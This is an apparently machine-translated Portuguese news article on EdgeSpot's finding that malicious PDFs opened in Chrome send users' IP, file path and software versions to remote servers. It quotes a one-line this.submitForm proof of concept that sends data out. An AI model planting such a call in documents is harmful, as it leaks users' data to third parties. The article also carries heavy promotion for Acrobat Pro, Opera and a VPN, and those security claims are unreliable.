- O EdgeSpot descobriu uma vulnerabilidade intrigante de dia zero explorando documentos PDF no Chrome.
- Esta vulnerabilidade pode prejudicá-lo ao coletar dados confidenciais em seu PC.
- Explore nosso Página da web e nuvem para obter mais informações sobre outras ferramentas e serviços.
- Se você estiver interessado em navegadores, fornecemos muitas informações sobre eles em nosso Hub de navegadores.
Torne todos os seus documentos acessíveis e seguros usando Adobe Acrobat Reader. Esta ferramenta de gerenciamento de documentos também permitirá que você assine e crie formulários oficiais para economizar seu tempo de trabalho. Obtenha-o para o seu PC e você será capaz de:
- Abra, imprima e edite todos os seus PDFs e outros tipos de arquivo
- Preencher formulários PDF mais facilmente
- Mantenha seus documentos essenciais criptografados
Obtenha todos os aplicativos a um preço especial!
O software de gerenciamento de documentos Nr.1 do mundo agora está com um ótimo preço, então corra!
Serviço de detecção de exploração que EdgeSpot descobriu um intrigante cromada vulnerabilidade de dia zero explorando documentos PDF.
A vulnerabilidade permite que os invasores colher dados sensíveis usando documentos PDF maliciosos abertos no Chrome.
Assim que a vítima abre os respectivos arquivos PDF no Google Chrome, um programa malicioso começa a trabalhar em segundo plano, coletando dados do usuário.
Os dados são então encaminhados para o servidor remoto que está sendo controlado pelos hackers. Você pode estar se perguntando quais dados estão sendo sugados pelos invasores, eles têm como alvo os seguintes dados em seu PC:
- endereço de IP
- Caminho completo do arquivo PDF no sistema
- Versões do sistema operacional e do Chrome
Cuidado com arquivos PDF repletos de malware
Especialistas visto aquele dos dois domínios readnotify [.] com ou burpcollaborator [.] net estava recebendo os dados.
Eles revelaram que os invasores estão usando o this.submitForm () PDF Javascript API para coletar informações confidenciais dos usuários.
Nós o testamos com um PoC mínimo, uma chamada de API simples como this.submitForm (‘ http://google.com/test’) fará com que o Google Chrome envie os dados pessoais para google.com.
Esse bug do Chrome estava sendo explorado por dois conjuntos distintos de arquivos PDF maliciosos, ambos circularam em outubro de 2017 e setembro de 2018, respectivamente.
Notavelmente, os dados coletados podem ser usados pelos invasores para ajustar os ataques no futuro. Os relatórios sugerem que o primeiro lote de arquivos foi compilado usando o serviço de rastreamento de PDF do ReadNotify.
Os usuários podem utilizar o serviço para controlar as visualizações do usuário. EdgeSpot não compartilhou nenhum detalhe sobre a natureza do segundo conjunto de arquivos PDF.
Dica rápida: mude seu navegador para Opera
Nestes tempos difíceis, somos atacados com malware, phishing e trojans em cada etapa, portanto, temos que estar muito mais vigilantes e permanecer protegidos.
E como este é um problema específico do Chrome, você pode evitar essa ameaça e todas as outras com um navegador orientado para a segurança, como Ópera.
Este navegador vem com um bloqueador de anúncios integrado que não apenas elimina essas distrações, mas também bloqueia scripts analíticos, pixels de rastreamento e métodos para coletar seus dados.
E se você quiser ter certeza absoluta de que está longe de qualquer perigo, fique atrás do VPN serviço 100% gratuito para uso por tempo ilimitado.
Ópera
O Opera oferece a proteção perfeita contra ameaças com o bloqueador de anúncios integrado e serviço VPN de graça!
Visite o site
Como posso ficar protegido contra vulnerabilidades de PDF?
Baixe Adobe Acrobat PRO
Adobe e Chrome são uma boa combinação quando se trata de lidar com arquivos PDF. Ao instalar a extensão Adobe para Chrome, você pode revisar e manipular PDFs de acordo com sua preferência, sem sair de seu navegador favorito.
Apesar de sua estrutura robusta, malware oculto em arquivos PDF pode não ser detectado se você estiver usando a versão padrão do Reader.
A versão profissional é recomendada para garantir sua proteção e manter seus dados longe de hackers.
Embora não seja gratuito, o preço que você pagará é bastante pequeno para a infinidade de recursos adicionais que você desfrutará, incluindo a segurança aprimorada de seus arquivos PDF.
Há também uma avaliação gratuita de 7 dias incluída para que você possa ter uma amostra da experiência Pro completa antes de fazer a compra.
Adobe Acrobat PRO
Fique longe de malware baixando Adobe Acrobat PRO. Tem muito mais recursos do que a versão gratuita e mantém seus dados seguros.
Visite o site
Caso queira estar seguro ao navegar na Internet, você precisará obter uma ferramenta totalmente dedicada para proteger sua rede. Instale agora o acesso privado à Internet e proteja-se. Ele protege seu PC de ataques durante a navegação, mascara seu endereço IP e bloqueia todos os acessos indesejados.
O serviço de detecção de Exploit EdgeSpot queria alertar os usuários do Chrome sobre os riscos potenciais porque o patch não era esperado para ser lançado em um futuro próximo.
O EdgeSpot relatou ao Google sobre a vulnerabilidade no ano passado e a empresa prometeu lançar um patch no final de abril.
No entanto, você pode considerar o uso de uma solução alternativa temporária para o problema, exibindo localmente os documentos PDF recebidos usando outro aplicativo leitor.
Como alternativa, você também pode abrir seus documentos PDF no Chrome, desconectando seus sistemas da Internet.
perguntas frequentes
Sim. Mas se você quiser uma seleção mais ampla, explore nossas principais escolhas para cromadaprivacidade extensões em este guia completo.
Taqui estão várias extensões que permitem PDFs em processamento. Verificar fora nosso excelente guia sobre as melhores extensões de PDF para o Chrome.
Não funciona, mas você pode ativá-lo rapidamente. Aqui está o nosso guia completo sobre como habilitar o gerador de código QR no Chrome.
